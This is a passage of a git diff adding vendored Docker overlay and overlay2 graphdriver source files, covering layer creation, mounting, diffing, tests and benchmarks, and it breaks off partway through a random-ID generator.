+
+func BenchmarkRead20Layers(b *testing.B) {
+	graphtest.DriverBenchDeepLayerRead(b, 20, "overlay")
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go
new file mode 100644
index 0000000000..3dbb4de44e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go
@@ -0,0 +1,3 @@
+// +build !linux
+
+package overlay
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go
new file mode 100644
index 0000000000..53a7199292
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go
@@ -0,0 +1,79 @@
+// +build linux
+
+package overlay2
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path"
+	"path/filepath"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/system"
+	"github.com/pkg/errors"
+)
+
+// hasOpaqueCopyUpBug checks whether the filesystem has a bug
+// which copies up the opaque flag when copying up an opaque
+// directory. When this bug exists naive diff should be used.
+func hasOpaqueCopyUpBug(d string) error {
+	td, err := ioutil.TempDir(d, "opaque-bug-check")
+	if err != nil {
+		return err
+	}
+	defer func() {
+		if err := os.RemoveAll(td); err != nil {
+			logrus.Warnf("Failed to remove check directory %v: %v", td, err)
+		}
+	}()
+
+	// Make directories l1/d, l2/d, l3, work, merged
+	if err := os.MkdirAll(filepath.Join(td, "l1", "d"), 0755); err != nil {
+		return err
+	}
+	if err := os.MkdirAll(filepath.Join(td, "l2", "d"), 0755); err != nil {
+		return err
+	}
+	if err := os.Mkdir(filepath.Join(td, "l3"), 0755); err != nil {
+		return err
+	}
+	if err := os.Mkdir(filepath.Join(td, "work"), 0755); err != nil {
+		return err
+	}
+	if err := os.Mkdir(filepath.Join(td, "merged"), 0755); err != nil {
+		return err
+	}
+
+	// Mark l2/d as opaque
+	if err := system.Lsetxattr(filepath.Join(td, "l2", "d"), "trusted.overlay.opaque", []byte("y"), 0); err != nil {
+		return errors.Wrap(err, "failed to set opaque flag on middle layer")
+	}
+
+	opts := fmt.Sprintf("lowerdir=%s:%s,upperdir=%s,workdir=%s", path.Join(td, "l2"), path.Join(td, "l1"), path.Join(td, "l3"), path.Join(td, "work"))
+	if err := syscall.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil {
+		return errors.Wrap(err, "failed to mount overlay")
+	}
+	defer func() {
+		if err := syscall.Unmount(filepath.Join(td, "merged"), 0); err != nil {
+			logrus.Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err)
+		}
+	}()
+
+	// Touch file in d to force copy up of opaque directory "d" from "l2" to "l3"
+	if err := ioutil.WriteFile(filepath.Join(td, "merged", "d", "f"), []byte{}, 0644); err != nil {
+		return errors.Wrap(err, "failed to write to merged directory")
+	}
+
+	// Check l3/d does not have opaque flag
+	xattrOpaque, err := system.Lgetxattr(filepath.Join(td, "l3", "d"), "trusted.overlay.opaque")
+	if err != nil {
+		return errors.Wrap(err, "failed to read opaque flag on upper layer")
+	}
+	if string(xattrOpaque) == "y" {
+		return errors.New("opaque flag erroneously copied up, consider update to kernel 4.8 or later to fix")
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go
new file mode 100644
index 0000000000..60e248b6d7
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go
@@ -0,0 +1,88 @@
+// +build linux
+
+package overlay2
+
+import (
+	"bytes"
+	"encoding/json"
+	"flag"
+	"fmt"
+	"os"
+	"runtime"
+	"syscall"
+
+	"github.com/docker/docker/pkg/reexec"
+)
+
+func init() {
+	reexec.Register("docker-mountfrom", mountFromMain)
+}
+
+func fatal(err error) {
+	fmt.Fprint(os.Stderr, err)
+	os.Exit(1)
+}
+
+type mountOptions struct {
+	Device string
+	Target string
+	Type   string
+	Label  string
+	Flag   uint32
+}
+
+func mountFrom(dir, device, target, mType string, flags uintptr, label string) error {
+	options := &mountOptions{
+		Device: device,
+		Target: target,
+		Type:   mType,
+		Flag:   uint32(flags),
+		Label:  label,
+	}
+
+	cmd := reexec.Command("docker-mountfrom", dir)
+	w, err := cmd.StdinPipe()
+	if err != nil {
+		return fmt.Errorf("mountfrom error on pipe creation: %v", err)
+	}
+
+	output := bytes.NewBuffer(nil)
+	cmd.Stdout = output
+	cmd.Stderr = output
+
+	if err := cmd.Start(); err != nil {
+		return fmt.Errorf("mountfrom error on re-exec cmd: %v", err)
+	}
+	//write the options to the pipe for the untar exec to read
+	if err := json.NewEncoder(w).Encode(options); err != nil {
+		return fmt.Errorf("mountfrom json encode to pipe failed: %v", err)
+	}
+	w.Close()
+
+	if err := cmd.Wait(); err != nil {
+		return fmt.Errorf("mountfrom re-exec error: %v: output: %s", err, output)
+	}
+	return nil
+}
+
+// mountfromMain is the entry-point for docker-mountfrom on re-exec.
+func mountFromMain() {
+	runtime.LockOSThread()
+	flag.Parse()
+
+	var options *mountOptions
+
+	if err := json.NewDecoder(os.Stdin).Decode(&options); err != nil {
+		fatal(err)
+	}
+
+	if err := os.Chdir(flag.Arg(0)); err != nil {
+		fatal(err)
+	}
+
+	if err := syscall.Mount(options.Device, options.Target, options.Type, uintptr(options.Flag), options.Label); err != nil {
+		fatal(err)
+	}
+
+	os.Exit(0)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go
new file mode 100644
index 0000000000..65ac6bfaeb
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go
@@ -0,0 +1,662 @@
+// +build linux
+
+package overlay2
+
+import (
+	"bufio"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"sync"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/daemon/graphdriver/overlayutils"
+	"github.com/docker/docker/daemon/graphdriver/quota"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/directory"
+	"github.com/docker/docker/pkg/fsutils"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/parsers"
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"github.com/docker/go-units"
+
+	"github.com/opencontainers/runc/libcontainer/label"
+)
+
+var (
+	// untar defines the untar method
+	untar = chrootarchive.UntarUncompressed
+)
+
+// This backend uses the overlay union filesystem for containers
+// with diff directories for each layer.
+
+// This version of the overlay driver requires at least kernel
+// 4.0.0 in order to support mounting multiple diff directories.
+
+// Each container/image has at least a "diff" directory and "link" file.
+// If there is also a "lower" file when there are diff layers
+// below as well as "merged" and "work" directories. The "diff" directory
+// has the upper layer of the overlay and is used to capture any
+// changes to the layer. The "lower" file contains all the lower layer
+// mounts separated by ":" and ordered from uppermost to lowermost
+// layers. The overlay itself is mounted in the "merged" directory,
+// and the "work" dir is needed for overlay to work.
+
+// The "link" file for each layer contains a unique string for the layer.
+// Under the "l" directory at the root there will be a symbolic link
+// with that unique string pointing the "diff" directory for the layer.
+// The symbolic links are used to reference lower layers in the "lower"
+// file and on mount. The links are used to shorten the total length
+// of a layer reference without requiring changes to the layer identifier
+// or root directory. Mounts are always done relative to root and
+// referencing the symbolic links in order to ensure the number of
+// lower directories can fit in a single page for making the mount
+// syscall. A hard upper limit of 128 lower layers is enforced to ensure
+// that mounts do not fail due to length.
+
+const (
+	driverName = "overlay2"
+	linkDir    = "l"
+	lowerFile  = "lower"
+	maxDepth   = 128
+
+	// idLength represents the number of random characters
+	// which can be used to create the unique link identifer
+	// for every layer. If this value is too long then the
+	// page size limit for the mount command may be exceeded.
+	// The idLength should be selected such that following equation
+	// is true (512 is a buffer for label metadata).
+	// ((idLength + len(linkDir) + 1) * maxDepth) <= (pageSize - 512)
+	idLength = 26
+)
+
+type overlayOptions struct {
+	overrideKernelCheck bool
+	quota               quota.Quota
+}
+
+// Driver contains information about the home directory and the list of active mounts that are created using this driver.
+type Driver struct {
+	home          string
+	uidMaps       []idtools.IDMap
+	gidMaps       []idtools.IDMap
+	ctr           *graphdriver.RefCounter
+	quotaCtl      *quota.Control
+	options       overlayOptions
+	naiveDiff     graphdriver.DiffDriver
+	supportsDType bool
+}
+
+var (
+	backingFs             = "<unknown>"
+	projectQuotaSupported = false
+
+	useNaiveDiffLock sync.Once
+	useNaiveDiffOnly bool
+)
+
+func init() {
+	graphdriver.Register(driverName, Init)
+}
+
+// Init returns the a native diff driver for overlay filesystem.
+// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error.
+// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned.
+func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
+	opts, err := parseOptions(options)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := supportsOverlay(); err != nil {
+		return nil, graphdriver.ErrNotSupported
+	}
+
+	// require kernel 4.0.0 to ensure multiple lower dirs are supported
+	v, err := kernel.GetKernelVersion()
+	if err != nil {
+		return nil, err
+	}
+	if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 0, Minor: 0}) < 0 {
+		if !opts.overrideKernelCheck {
+			return nil, graphdriver.ErrNotSupported
+		}
+		logrus.Warn("Using pre-4.0.0 kernel for overlay2, mount failures may require kernel update")
+	}
+
+	fsMagic, err := graphdriver.GetFSMagic(home)
+	if err != nil {
+		return nil, err
+	}
+	if fsName, ok := graphdriver.FsNames[fsMagic]; ok {
+		backingFs = fsName
+	}
+
+	// check if they are running over btrfs, aufs, zfs, overlay, or ecryptfs
+	switch fsMagic {
+	case graphdriver.FsMagicBtrfs, graphdriver.FsMagicAufs, graphdriver.FsMagicZfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicEcryptfs:
+		logrus.Errorf("'overlay2' is not supported over %s", backingFs)
+		return nil, graphdriver.ErrIncompatibleFS
+	}
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
+	if err != nil {
+		return nil, err
+	}
+	// Create the driver home dir
+	if err := idtools.MkdirAllAs(path.Join(home, linkDir), 0700, rootUID, rootGID); err != nil && !os.IsExist(err) {
+		return nil, err
+	}
+
+	if err := mount.MakePrivate(home); err != nil {
+		return nil, err
+	}
+
+	supportsDType, err := fsutils.SupportsDType(home)
+	if err != nil {
+		return nil, err
+	}
+	if !supportsDType {
+		// not a fatal error until v1.16 (#27443)
+		logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay2", backingFs))
+	}
+
+	d := &Driver{
+		home:          home,
+		uidMaps:       uidMaps,
+		gidMaps:       gidMaps,
+		ctr:           graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)),
+		supportsDType: supportsDType,
+	}
+
+	d.naiveDiff = graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps)
+
+	if backingFs == "xfs" {
+		// Try to enable project quota support over xfs.
+		if d.quotaCtl, err = quota.NewControl(home); err == nil {
+			projectQuotaSupported = true
+		}
+	}
+
+	logrus.Debugf("backingFs=%s,  projectQuotaSupported=%v", backingFs, projectQuotaSupported)
+
+	return d, nil
+}
+
+func parseOptions(options []string) (*overlayOptions, error) {
+	o := &overlayOptions{}
+	for _, option := range options {
+		key, val, err := parsers.ParseKeyValueOpt(option)
+		if err != nil {
+			return nil, err
+		}
+		key = strings.ToLower(key)
+		switch key {
+		case "overlay2.override_kernel_check":
+			o.overrideKernelCheck, err = strconv.ParseBool(val)
+			if err != nil {
+				return nil, err
+			}
+
+		default:
+			return nil, fmt.Errorf("overlay2: Unknown option %s\n", key)
+		}
+	}
+	return o, nil
+}
+
+func supportsOverlay() error {
+	// We can try to modprobe overlay first before looking at
+	// proc/filesystems for when overlay is supported
+	exec.Command("modprobe", "overlay").Run()
+
+	f, err := os.Open("/proc/filesystems")
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+
+	s := bufio.NewScanner(f)
+	for s.Scan() {
+		if s.Text() == "nodev\toverlay" {
+			return nil
+		}
+	}
+	logrus.Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.")
+	return graphdriver.ErrNotSupported
+}
+
+func useNaiveDiff(home string) bool {
+	useNaiveDiffLock.Do(func() {
+		if err := hasOpaqueCopyUpBug(home); err != nil {
+			logrus.Warnf("Not using native diff for overlay2: %v", err)
+			useNaiveDiffOnly = true
+		}
+	})
+	return useNaiveDiffOnly
+}
+
+func (d *Driver) String() string {
+	return driverName
+}
+
+// Status returns current driver information in a two dimensional string array.
+// Output contains "Backing Filesystem" used in this implementation.
+func (d *Driver) Status() [][2]string {
+	return [][2]string{
+		{"Backing Filesystem", backingFs},
+		{"Supports d_type", strconv.FormatBool(d.supportsDType)},
+		{"Native Overlay Diff", strconv.FormatBool(!useNaiveDiff(d.home))},
+	}
+}
+
+// GetMetadata returns meta data about the overlay driver such as
+// LowerDir, UpperDir, WorkDir and MergeDir used to store data.
+func (d *Driver) GetMetadata(id string) (map[string]string, error) {
+	dir := d.dir(id)
+	if _, err := os.Stat(dir); err != nil {
+		return nil, err
+	}
+
+	metadata := map[string]string{
+		"WorkDir":   path.Join(dir, "work"),
+		"MergedDir": path.Join(dir, "merged"),
+		"UpperDir":  path.Join(dir, "diff"),
+	}
+
+	lowerDirs, err := d.getLowerDirs(id)
+	if err != nil {
+		return nil, err
+	}
+	if len(lowerDirs) > 0 {
+		metadata["LowerDir"] = strings.Join(lowerDirs, ":")
+	}
+
+	return metadata, nil
+}
+
+// Cleanup any state created by overlay which should be cleaned when daemon
+// is being shutdown. For now, we just have to unmount the bind mounted
+// we had created.
+func (d *Driver) Cleanup() error {
+	return mount.Unmount(d.home)
+}
+
+// CreateReadWrite creates a layer that is writable for use as a container
+// file system.
+func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
+	return d.Create(id, parent, opts)
+}
+
+// Create is used to create the upper, lower, and merge directories required for overlay fs for a given id.
+// The parent filesystem is used to configure these directories for the overlay.
+func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) {
+
+	if opts != nil && len(opts.StorageOpt) != 0 && !projectQuotaSupported {
+		return fmt.Errorf("--storage-opt is supported only for overlay over xfs with 'pquota' mount option")
+	}
+
+	dir := d.dir(id)
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
+	if err != nil {
+		return err
+	}
+	if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil {
+		return err
+	}
+	if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil {
+		return err
+	}
+
+	defer func() {
+		// Clean up on failure
+		if retErr != nil {
+			os.RemoveAll(dir)
+		}
+	}()
+
+	if opts != nil && len(opts.StorageOpt) > 0 {
+		driver := &Driver{}
+		if err := d.parseStorageOpt(opts.StorageOpt, driver); err != nil {
+			return err
+		}
+
+		if driver.options.quota.Size > 0 {
+			// Set container disk quota limit
+			if err := d.quotaCtl.SetQuota(dir, driver.options.quota); err != nil {
+				return err
+			}
+		}
+	}
+
+	if err := idtools.MkdirAs(path.Join(dir, "diff"), 0755, rootUID, rootGID); err != nil {
+		return err
+	}
+
+	lid := generateID(idLength)
+	if err := os.Symlink(path.Join("..", id, "diff"), path.Join(d.home, linkDir, lid)); err != nil {
+		return err
+	}
+
+	// Write link id to link file
+	if err := ioutil.WriteFile(path.Join(dir, "link"), []byte(lid), 0644); err != nil {
+		return err
+	}
+
+	// if no parent directory, done
+	if parent == "" {
+		return nil
+	}
+
+	if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil {
+		return err
+	}
+	if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil {
+		return err
+	}
+
+	lower, err := d.getLower(parent)
+	if err != nil {
+		return err
+	}
+	if lower != "" {
+		if err := ioutil.WriteFile(path.Join(dir, lowerFile), []byte(lower), 0666); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+// Parse overlay storage options
+func (d *Driver) parseStorageOpt(storageOpt map[string]string, driver *Driver) error {
+	// Read size to set the disk project quota per container
+	for key, val := range storageOpt {
+		key := strings.ToLower(key)
+		switch key {
+		case "size":
+			size, err := units.RAMInBytes(val)
+			if err != nil {
+				return err
+			}
+			driver.options.quota.Size = uint64(size)
+		default:
+			return fmt.Errorf("Unknown option %s", key)
+		}
+	}
+
+	return nil
+}
+
+func (d *Driver) getLower(parent string) (string, error) {
+	parentDir := d.dir(parent)
+
+	// Ensure parent exists
+	if _, err := os.Lstat(parentDir); err != nil {
+		return "", err
+	}
+
+	// Read Parent link fileA
+	parentLink, err := ioutil.ReadFile(path.Join(parentDir, "link"))
+	if err != nil {
+		return "", err
+	}
+	lowers := []string{path.Join(linkDir, string(parentLink))}
+
+	parentLower, err := ioutil.ReadFile(path.Join(parentDir, lowerFile))
+	if err == nil {
+		parentLowers := strings.Split(string(parentLower), ":")
+		lowers = append(lowers, parentLowers...)
+	}
+	if len(lowers) > maxDepth {
+		return "", errors.New("max depth exceeded")
+	}
+	return strings.Join(lowers, ":"), nil
+}
+
+func (d *Driver) dir(id string) string {
+	return path.Join(d.home, id)
+}
+
+func (d *Driver) getLowerDirs(id string) ([]string, error) {
+	var lowersArray []string
+	lowers, err := ioutil.ReadFile(path.Join(d.dir(id), lowerFile))
+	if err == nil {
+		for _, s := range strings.Split(string(lowers), ":") {
+			lp, err := os.Readlink(path.Join(d.home, s))
+			if err != nil {
+				return nil, err
+			}
+			lowersArray = append(lowersArray, path.Clean(path.Join(d.home, linkDir, lp)))
+		}
+	} else if !os.IsNotExist(err) {
+		return nil, err
+	}
+	return lowersArray, nil
+}
+
+// Remove cleans the directories that are created for this id.
+func (d *Driver) Remove(id string) error {
+	dir := d.dir(id)
+	lid, err := ioutil.ReadFile(path.Join(dir, "link"))
+	if err == nil {
+		if err := os.RemoveAll(path.Join(d.home, linkDir, string(lid))); err != nil {
+			logrus.Debugf("Failed to remove link: %v", err)
+		}
+	}
+
+	if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+	return nil
+}
+
+// Get creates and mounts the required file system for the given id and returns the mount path.
+func (d *Driver) Get(id string, mountLabel string) (s string, err error) {
+	dir := d.dir(id)
+	if _, err := os.Stat(dir); err != nil {
+		return "", err
+	}
+
+	diffDir := path.Join(dir, "diff")
+	lowers, err := ioutil.ReadFile(path.Join(dir, lowerFile))
+	if err != nil {
+		// If no lower, just return diff directory
+		if os.IsNotExist(err) {
+			return diffDir, nil
+		}
+		return "", err
+	}
+
+	mergedDir := path.Join(dir, "merged")
+	if count := d.ctr.Increment(mergedDir); count > 1 {
+		return mergedDir, nil
+	}
+	defer func() {
+		if err != nil {
+			if c := d.ctr.Decrement(mergedDir); c <= 0 {
+				syscall.Unmount(mergedDir, 0)
+			}
+		}
+	}()
+
+	workDir := path.Join(dir, "work")
+	splitLowers := strings.Split(string(lowers), ":")
+	absLowers := make([]string, len(splitLowers))
+	for i, s := range splitLowers {
+		absLowers[i] = path.Join(d.home, s)
+	}
+	opts := fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", strings.Join(absLowers, ":"), path.Join(dir, "diff"), path.Join(dir, "work"))
+	mountData := label.FormatMountLabel(opts, mountLabel)
+	mount := syscall.Mount
+	mountTarget := mergedDir
+
+	pageSize := syscall.Getpagesize()
+
+	// Go can return a larger page size than supported by the system
+	// as of go 1.7. This will be fixed in 1.8 and this block can be
+	// removed when building with 1.8.
+	// See https://github.com/golang/go/commit/1b9499b06989d2831e5b156161d6c07642926ee1
+	// See https://github.com/docker/docker/issues/27384
+	if pageSize > 4096 {
+		pageSize = 4096
+	}
+
+	// Use relative paths and mountFrom when the mount data has exceeded
+	// the page size. The mount syscall fails if the mount data cannot
+	// fit within a page and relative links make the mount data much
+	// smaller at the expense of requiring a fork exec to chroot.
+	if len(mountData) > pageSize {
+		opts = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", string(lowers), path.Join(id, "diff"), path.Join(id, "work"))
+		mountData = label.FormatMountLabel(opts, mountLabel)
+		if len(mountData) > pageSize {
+			return "", fmt.Errorf("cannot mount layer, mount label too large %d", len(mountData))
+		}
+
+		mount = func(source string, target string, mType string, flags uintptr, label string) error {
+			return mountFrom(d.home, source, target, mType, flags, label)
+		}
+		mountTarget = path.Join(id, "merged")
+	}
+
+	if err := mount("overlay", mountTarget, "overlay", 0, mountData); err != nil {
+		return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err)
+	}
+
+	// chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a
+	// user namespace requires this to move a directory from lower to upper.
+	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
+	if err != nil {
+		return "", err
+	}
+
+	if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil {
+		return "", err
+	}
+
+	return mergedDir, nil
+}
+
+// Put unmounts the mount path created for the give id.
+func (d *Driver) Put(id string) error {
+	mountpoint := path.Join(d.dir(id), "merged")
+	if count := d.ctr.Decrement(mountpoint); count > 0 {
+		return nil
+	}
+	if err := syscall.Unmount(mountpoint, 0); err != nil {
+		logrus.Debugf("Failed to unmount %s overlay: %s - %v", id, mountpoint, err)
+	}
+	return nil
+}
+
+// Exists checks to see if the id is already mounted.
+func (d *Driver) Exists(id string) bool {
+	_, err := os.Stat(d.dir(id))
+	return err == nil
+}
+
+// isParent returns if the passed in parent is the direct parent of the passed in layer
+func (d *Driver) isParent(id, parent string) bool {
+	lowers, err := d.getLowerDirs(id)
+	if err != nil {
+		return false
+	}
+	if parent == "" && len(lowers) > 0 {
+		return false
+	}
+
+	parentDir := d.dir(parent)
+	var ld string
+	if len(lowers) > 0 {
+		ld = filepath.Dir(lowers[0])
+	}
+	if ld == "" && parent == "" {
+		return true
+	}
+	return ld == parentDir
+}
+
+// ApplyDiff applies the new layer into a root
+func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64, err error) {
+	if !d.isParent(id, parent) {
+		return d.naiveDiff.ApplyDiff(id, parent, diff)
+	}
+
+	applyDir := d.getDiffPath(id)
+
+	logrus.Debugf("Applying tar in %s", applyDir)
+	// Overlay doesn't need the parent id to apply the diff
+	if err := untar(diff, applyDir, &archive.TarOptions{
+		UIDMaps:        d.uidMaps,
+		GIDMaps:        d.gidMaps,
+		WhiteoutFormat: archive.OverlayWhiteoutFormat,
+	}); err != nil {
+		return 0, err
+	}
+
+	return directory.Size(applyDir)
+}
+
+func (d *Driver) getDiffPath(id string) string {
+	dir := d.dir(id)
+
+	return path.Join(dir, "diff")
+}
+
+// DiffSize calculates the changes between the specified id
+// and its parent and returns the size in bytes of the changes
+// relative to its base filesystem directory.
+func (d *Driver) DiffSize(id, parent string) (size int64, err error) {
+	if useNaiveDiff(d.home) || !d.isParent(id, parent) {
+		return d.naiveDiff.DiffSize(id, parent)
+	}
+	return directory.Size(d.getDiffPath(id))
+}
+
+// Diff produces an archive of the changes between the specified
+// layer and its parent layer which may be "".
+func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) {
+	if useNaiveDiff(d.home) || !d.isParent(id, parent) {
+		return d.naiveDiff.Diff(id, parent)
+	}
+
+	diffPath := d.getDiffPath(id)
+	logrus.Debugf("Tar with options on %s", diffPath)
+	return archive.TarWithOptions(diffPath, &archive.TarOptions{
+		Compression:    archive.Uncompressed,
+		UIDMaps:        d.uidMaps,
+		GIDMaps:        d.gidMaps,
+		WhiteoutFormat: archive.OverlayWhiteoutFormat,
+	})
+}
+
+// Changes produces a list of changes between the specified layer
+// and its parent layer. If parent is "", then all changes will be ADD changes.
+func (d *Driver) Changes(id, parent string) ([]archive.Change, error) {
+	if useNaiveDiff(d.home) || !d.isParent(id, parent) {
+		return d.naiveDiff.Changes(id, parent)
+	}
+	// Overlay doesn't have snapshots, so we need to get changes from all parent
+	// layers.
+	diffPath := d.getDiffPath(id)
+	layers, err := d.getLowerDirs(id)
+	if err != nil {
+		return nil, err
+	}
+
+	return archive.OverlayChanges(layers, diffPath)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go
new file mode 100644
index 0000000000..cf77ff22be
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go
@@ -0,0 +1,121 @@
+// +build linux
+
+package overlay2
+
+import (
+	"io/ioutil"
+	"os"
+	"syscall"
+	"testing"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/daemon/graphdriver/graphtest"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/reexec"
+)
+
+func init() {
+	// Do not sure chroot to speed run time and allow archive
+	// errors or hangs to be debugged directly from the test process.
+	untar = archive.UntarUncompressed
+	graphdriver.ApplyUncompressedLayer = archive.ApplyUncompressedLayer
+
+	reexec.Init()
+}
+
+func cdMountFrom(dir, device, target, mType, label string) error {
+	wd, err := os.Getwd()
+	if err != nil {
+		return err
+	}
+	os.Chdir(dir)
+	defer os.Chdir(wd)
+
+	return syscall.Mount(device, target, mType, 0, label)
+}
+
+func skipIfNaive(t *testing.T) {
+	td, err := ioutil.TempDir("", "naive-check-")
+	if err != nil {
+		t.Fatalf("Failed to create temp dir: %v", err)
+	}
+	defer os.RemoveAll(td)
+
+	if useNaiveDiff(td) {
+		t.Skipf("Cannot run test with naive diff")
+	}
+}
+
+// This avoids creating a new driver for each test if all tests are run
+// Make sure to put new tests between TestOverlaySetup and TestOverlayTeardown
+func TestOverlaySetup(t *testing.T) {
+	graphtest.GetDriver(t, driverName)
+}
+
+func TestOverlayCreateEmpty(t *testing.T) {
+	graphtest.DriverTestCreateEmpty(t, driverName)
+}
+
+func TestOverlayCreateBase(t *testing.T) {
+	graphtest.DriverTestCreateBase(t, driverName)
+}
+
+func TestOverlayCreateSnap(t *testing.T) {
+	graphtest.DriverTestCreateSnap(t, driverName)
+}
+
+func TestOverlay128LayerRead(t *testing.T) {
+	graphtest.DriverTestDeepLayerRead(t, 128, driverName)
+}
+
+func TestOverlayDiffApply10Files(t *testing.T) {
+	skipIfNaive(t)
+	graphtest.DriverTestDiffApply(t, 10, driverName)
+}
+
+func TestOverlayChanges(t *testing.T) {
+	skipIfNaive(t)
+	graphtest.DriverTestChanges(t, driverName)
+}
+
+func TestOverlayTeardown(t *testing.T) {
+	graphtest.PutDriver(t)
+}
+
+// Benchmarks should always setup new driver
+
+func BenchmarkExists(b *testing.B) {
+	graphtest.DriverBenchExists(b, driverName)
+}
+
+func BenchmarkGetEmpty(b *testing.B) {
+	graphtest.DriverBenchGetEmpty(b, driverName)
+}
+
+func BenchmarkDiffBase(b *testing.B) {
+	graphtest.DriverBenchDiffBase(b, driverName)
+}
+
+func BenchmarkDiffSmallUpper(b *testing.B) {
+	graphtest.DriverBenchDiffN(b, 10, 10, driverName)
+}
+
+func BenchmarkDiff10KFileUpper(b *testing.B) {
+	graphtest.DriverBenchDiffN(b, 10, 10000, driverName)
+}
+
+func BenchmarkDiff10KFilesBottom(b *testing.B) {
+	graphtest.DriverBenchDiffN(b, 10000, 10, driverName)
+}
+
+func BenchmarkDiffApply100(b *testing.B) {
+	graphtest.DriverBenchDiffApplyN(b, 100, driverName)
+}
+
+func BenchmarkDiff20Layers(b *testing.B) {
+	graphtest.DriverBenchDeepLayerDiff(b, 20, driverName)
+}
+
+func BenchmarkRead20Layers(b *testing.B) {
+	graphtest.DriverBenchDeepLayerRead(b, 20, driverName)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go
new file mode 100644
index 0000000000..e5ac4ca8c6
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go
@@ -0,0 +1,3 @@
+// +build !linux
+
+package overlay2
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go
new file mode 100644
index 0000000000..af5cb659d5
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go
@@ -0,0 +1,80 @@
+// +build linux
+
+package overlay2
+
+import (
+	"crypto/rand"
+	"encoding/base32"
+	"fmt"
+	"io"
+	"os"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+)
+
+// generateID creates a new random string identifier with the given length
+func generateID(l int) string {
+	const (
+		// ensures we backoff for less than 450ms total. Use the following to
+		// select new value, in units of 10ms:
+		// 	n*(n+1)/2 = d -> n^2 + n - 2d -> n = (sqrt(8d + 1) - 1)/2
+		maxretries = 9
+		backoff    = time.Millisecond * 10
+	)
+
+	var (
+		totalBackoff time.Duration
+		count        int
+		retries      int
+		size         = (l*5 + 7) / 8
+		u            = make([]byte, size)
+	)
+	// TODO: Include time component, counter component, random component
+
+	for {
+		// This should never block but the read may fail. Because of this,
+		// we just try to read the random number generator until we get
+		// something. This is a very rare condition but may happen.
